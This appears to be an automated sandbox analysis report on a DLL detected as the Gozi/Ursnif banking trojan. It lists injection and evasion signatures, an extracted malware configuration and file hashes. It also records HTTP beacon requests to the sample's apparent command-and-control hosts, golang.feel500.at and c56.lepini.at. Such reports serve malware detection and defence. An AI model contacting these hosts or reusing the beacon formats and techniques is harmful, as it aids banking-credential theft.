Analysis Report u.dll

Overview

General Information

Sample Name: u.dll
Analysis ID: 340570
MD5: 27b993fac30602ea1db166a101e953cd
SHA1: 2054819f55d10f3f241ffa27fa7996a0edeb8722
SHA256: 61774f16549fb39d6d28ea208634bb106294bb2e31e6847d804f74a08a4bc0e2
Tags: api1ursnif

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: loaddll32.exe.5388.0.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "167", "system": "534e14562e5454b7ff528954966ab0fbhh", "size": "201284", "crc": "2", "action": "00000000", "id": "1100", "time": "1610850252", "user": "f73be0088695dc15e71ab15c3e220863", "hash": "0x9e9e912e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: u.dll Metadefender: Detection: 37%
Source: u.dll ReversingLabs: Detection: 62%
Machine Learning detection for sample
Source: u.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.810000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files
Source: u.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.403057953.0000022AC2C50000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.409373229.00000285A6DD0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0076E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0077888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00784FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00784FE1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007705EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_007705EF

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/uwAgMP_2FLcVGWT97wRz/iFuHzBrE_2BSOdMeVCC/MCeuWpe0oeS60koRr7ouEQ/mA6VPayDQaLka/FRRumVTO/R6jyPxG53t8jXNaUuut9HZp/_2FeFn_2Bv/FxzrB85qzirN1_2Br/h9aBdGM8_2F8/izm7K9qYo3p/coPYeEK7OXBvB1/3rTZ1KEHgQsipis_2BsU6/JxYhGHE4BQ9PqivC/FDEoEqqIA8TiNnR/W2sxdloLwBiD447Ckp/zU8QnBlT0/RAx4pi_2FFnJRoMwbcHr/E0Q28GjxYmwU0s8C_2F/RdJV3E8NjousASoWzP2B0B/b7Fopjfk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/4Mp9Bb14Sy5p7GvBrQ/e6g_2FX3A/zzGuh2QtxluYpZlF_2Fz/TQxCK8s7Y1j2YlE561k/l3Tu3oNGiBi_2B1LxXl9ix/tdkHWE3zb3013/NCe8_2FS/Znb2CJqJMCRGryN4PSOzj75/v9CbgnKlGO/etpX9GZzX383qc3kj/4QMA7zJBU1Ic/EzGhR_2FzoP/3_2B6WVpUtzuV3/qdJHK_2F2IGepdTevlhm8/rNr4OwxdD34091kc/dNsLbz7JZDdgUXq/IuIRIkxRhwde9K6HME/67IWHOJgs/jyVSKVmBH_2Fm_2FvWwu/O341hvVg_2FQb_2B3aR/QcUJcqb4Pt1RjuiXC_2Bm5/xsdXvU7m HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/OvqSLxhTQ3_2FvabW_/2FgZB0ja6/5x9Za3_2FQN4ZdUGH6lo/suw50whDv5PhfbDIdeX/T8eQmCtvYhggs3SS3gjEZp/M9FvWod65aEU9/G6avRfSM/LfZoGD4M2GwS3WWXnDZAQsS/VIiOqdfsU1/pU1_2B6cKaXhAnsco/82IM1VR4P9YJ/_2BGT5YwaNg/KNwzb_2F0dky5V/sFXJntfI7YvzRXn9ooIqO/8cWsv_2FMjFm7Qz8/GqjkN8IiVtb8odv/cswSX5yoUMDZAw42Dq/yWZp HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU/Dpv9nLyrcxEtZtJ/aFk5WP8GrjDU6G2qhU/pfczd6wQ0/VQNjrLUxUcw28TdaAijZ/89nWrTX52c7_2FR0UrN/cXuYEo71O4zWb5pZgnZUnE/a4LShAF2E9csS/CV2_2FBR/zc7igOEVQPQIDcjgOx7vNeT/w89tSFUR_2/B8TFVzEvMI9Q1_2Fs/VFFyBcB1hsce/wRFgoZFfP6P/IBtRYE5NliJiT7/EKsY85FO4bqdIDJLInDKV/tHpq5V_2FqaGA1EL/anvzDbUyWBHQ440/SYAUKxVK/j HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xcf6dcc9a,0x01d6ec77</date><accdate>0xcf6dcc9a,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xcf6dcc9a,0x01d6ec77</date><accdate>0xcf6dcc9a,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xcf702eec,0x01d6ec77</date><accdate>0xcf702eec,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xcf702eec,0x01d6ec77</date><accdate>0xcf702eec,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xcf72914d,0x01d6ec77</date><accdate>0xcf72914d,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xcf72914d,0x01d6ec77</date><accdate>0xcf72914d,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: golang.feel500.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 16 Jan 2021 17:23:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000023.00000000.435411741.000000000F540000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000023.00000000.435486127.000000000F599000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof
Source: u.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: u.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: {13BBE1FF-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFF242F5BB1698763D.TMP.21.dr String found in binary or memory: http://golang.feel500.at/api1/4Mp9Bb14Sy5p7GvBrQ/e6g_2FX3A/zzGuh2QtxluYpZlF_2Fz/TQxCK8s7Y1j2YlE561k/
Source: RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp String found in binary or memory: http://golang.feel500.at/api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU
Source: {13BBE203-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr String found in binary or memory: http://golang.feel500.at/api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU/Dpv9
Source: {13BBE201-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFC4A6EAD0B1D57EF4.TMP.21.dr String found in binary or memory: http://golang.feel500.at/api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/
Source: {F8107B90-586A-11EB-90E4-ECF4BB862DED}.dat.5.dr String found in binary or memory: http://golang.feel500.at/api1/uwAgMP_2FLcVGWT97wRz/iFuHzBrE_2BSOdMeVCC/MCeuWpe0oeS60koRr7ouEQ/mA6VPa
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: u.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001B.00000002.1017567329.000001FE0020F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
